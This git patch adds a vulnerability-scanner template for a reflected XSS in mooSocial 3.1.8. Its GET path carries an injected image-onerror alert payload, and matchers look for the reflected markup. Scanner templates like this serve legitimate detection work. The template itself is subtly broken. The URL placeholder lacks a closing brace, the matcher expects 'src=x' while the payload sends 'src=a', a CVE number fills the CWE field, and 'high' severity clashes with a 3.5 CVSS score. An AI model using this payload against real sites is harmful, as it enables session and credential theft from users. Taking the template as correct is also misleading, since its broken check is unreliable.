From 99f32ed1028dcab8b8c94dc6b6c6de7d6ed6973c Mon Sep 17 00:00:00 2001
From: momika233 <56291820+momika233@users.noreply.github.com>
Date: Wed, 16 Aug 2023 00:09:48 +0800
Subject: [PATCH] Add files via upload

---
 http/vulnerabilities/mooSocial-xss.yaml | 39 +++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 http/vulnerabilities/mooSocial-xss.yaml

diff --git a/http/vulnerabilities/mooSocial-xss.yaml b/http/vulnerabilities/mooSocial-xss.yaml
new file mode 100644
index 0000000000..398029077e
--- /dev/null
+++ b/http/vulnerabilities/mooSocial-xss.yaml
@@ -0,0 +1,39 @@
+id: mooSocial-xss
+
+info:
+  name: mooSocial 3.1.8 - Reflected XSS
+  author: momika233
+  severity: high
+  description: |
+    The attacker can send to victim a link containing a malicious URL in an email or instant message,can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+  reference:
+    - https://www.exploit-db.com/exploits/51670
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
+    cvss-score: 3.5
+    cwe-id: CVE-2023-4173
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: "mooSocial"
+  tags: mooSocial,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}/classifiedsmomika233\"><img%20src=a%20onerror=alert('momika233')>momika233/search?category=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"text":"<img src=x onerror=alert(\'momika233\')>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file